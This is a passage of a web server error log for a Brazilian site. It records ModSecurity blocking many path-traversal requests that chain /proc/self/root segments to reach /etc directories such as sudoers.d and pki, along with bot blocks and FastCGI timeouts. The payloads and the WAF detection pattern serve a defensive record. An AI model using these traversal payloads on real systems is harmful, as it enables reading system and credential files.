[tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivEAQohV2v-7oj5HG-jAAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:32:05.125919 2026] [proxy_fcgi:error] [pid 2304:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:34582] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:32:11.984184 2026] [:error] [pid 2325:tid 140411741927168] [client 74.7.243.203:48772] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivG-82sZHvlq4xgHqD-AAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:32:17.674996 2026] [:error] [pid 2304:tid 140411582465792] [client 74.7.243.203:50728] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivIch3JZxwdBQwPYG0_wAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:32:27.126034 2026] [proxy_fcgi:error] [pid 4740:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34816] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:32:34.327572 2026] [:error] [pid 2305:tid 140411699963648] [client 74.7.243.203:59120] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivMgQohV2v-7oj5HG-mwAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:32:51.121954 2026] [proxy_fcgi:error] [pid 2325:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35070] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:32:56.909412 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.243.203:40950] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivSKBJNF7axNlVR0W9NwAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:32:59.545417 2026] [:error] [pid 2325:tid 140411683178240] [client 74.7.243.203:56926] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivS-82sZHvlq4xgHqEDgAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:33:00.892085 2026] [:error] [pid 4740:tid 140411599251200] [client 74.7.243.203:33484] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivTAfYLcKp6Sb5AeL3BgAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:33:13.054015 2026] [proxy_fcgi:error] [pid 2473:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35240] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:33:14.216314 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.243.203:33496] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivWqBJNF7axNlVR0W9QwAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:33:19.576249 2026] [:error] [pid 4740:tid 140411691570944] [client 74.7.243.203:44554] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivXwfYLcKp6Sb5AeL3FwAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:33:22.709834 2026] [:error] [pid 2304:tid 140411574073088] [client 74.7.243.203:52614] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivYsh3JZxwdBQwPYG1KwAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:33:35.137823 2026] [proxy_fcgi:error] [pid 2304:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35478] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:33:40.345655 2026] [:error] [pid 4740:tid 140411540502272] [client 74.7.228.16:35652] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abivdAfYLcKp6Sb5AeL3IwAAAFg"]
[Mon Mar 16 22:33:45.776439 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.243.203:52622] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiveaBJNF7axNlVR0W9WgAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:33:47.501497 2026] [:error] [pid 2304:tid 140411590858496] [client 74.7.243.203:34072] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abive8h3JZxwdBQwPYG1QwAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:33:56.129782 2026] [proxy_fcgi:error] [pid 2305:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35810] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:33:58.914141 2026] [:error] [pid 2304:tid 140411616036608] [client 74.7.244.31:60540] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abivhsh3JZxwdBQwPYG1SwAAAI8"]
[Mon Mar 16 22:34:08.462954 2026] [:error] [pid 2305:tid 140411741927168] [client 74.7.243.203:42740] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivkAQohV2v-7oj5HG_DgAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:34:18.158326 2026] [proxy_fcgi:error] [pid 2304:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36084] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:34:19.421253 2026] [:error] [pid 2325:tid 140411708356352] [client 74.7.243.203:52578] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivm-82sZHvlq4xgHqEWQAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:34:23.034011 2026] [:error] [pid 2305:tid 140411733534464] [client 74.7.243.203:47152] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivnwQohV2v-7oj5HG_IwAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:34:24.300696 2026] [:error] [pid 4740:tid 140411599251200] [client 74.7.243.203:47162] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivoAfYLcKp6Sb5AeL3RQAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:34:27.405850 2026] [:error] [pid 2304:tid 140411733534464] [client 74.7.243.203:47164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivosh3JZxwdBQwPYG1VwAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:34:40.121781 2026] [proxy_fcgi:error] [pid 4740:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36348] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:34:42.294742 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.243.203:47172] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abivsqBJNF7axNlVR0W9fgAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:35:02.689822 2026] [proxy_fcgi:error] [pid 2473:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36584] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:35:25.045822 2026] [proxy_fcgi:error] [pid 2473:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:36810] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:35:47.116673 2026] [proxy_fcgi:error] [pid 2325:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37102] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:36:09.145272 2026] [proxy_fcgi:error] [pid 2473:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:37392] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:36:32.069929 2026] [proxy_fcgi:error] [pid 4740:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:37724] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:36:55.129849 2026] [proxy_fcgi:error] [pid 2473:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37996] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:37:17.114638 2026] [proxy_fcgi:error] [pid 2325:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38254] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:37:39.135590 2026] [proxy_fcgi:error] [pid 2304:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38552] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:38:02.129835 2026] [proxy_fcgi:error] [pid 4740:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:38890] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:38:24.125933 2026] [proxy_fcgi:error] [pid 2304:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39262] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:38:46.133816 2026] [proxy_fcgi:error] [pid 2473:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39650] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:38:46.222766 2026] [:error] [pid 2305:tid 140411582465792] [client 74.7.228.16:37938] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiwpgQohV2v-7oj5HHAAQAAAZM"]
[Mon Mar 16 22:39:08.116063 2026] [proxy_fcgi:error] [pid 2305:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40022] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:39:08.744239 2026] [:error] [pid 2305:tid 140411540502272] [client 74.7.244.31:58606] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiwvAQohV2v-7oj5HHAHAAAAZg"]
[Mon Mar 16 22:39:30.129799 2026] [proxy_fcgi:error] [pid 4740:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:40414] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:39:58.139714 2026] [proxy_fcgi:error] [pid 4740:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40902] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:40:21.149832 2026] [proxy_fcgi:error] [pid 2325:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:41280] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:40:42.125795 2026] [proxy_fcgi:error] [pid 2305:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:41748] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:41:03.105818 2026] [proxy_fcgi:error] [pid 2473:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42242] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:41:24.132118 2026] [proxy_fcgi:error] [pid 2305:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42602] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:41:47.129793 2026] [proxy_fcgi:error] [pid 2325:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:42984] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:42:08.574925 2026] [proxy_fcgi:error] [pid 2325:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:43334] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:42:30.128162 2026] [proxy_fcgi:error] [pid 2473:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:43782] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:42:51.125767 2026] [proxy_fcgi:error] [pid 2304:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:44200] AH01075: Error dispatching request to : (polling)
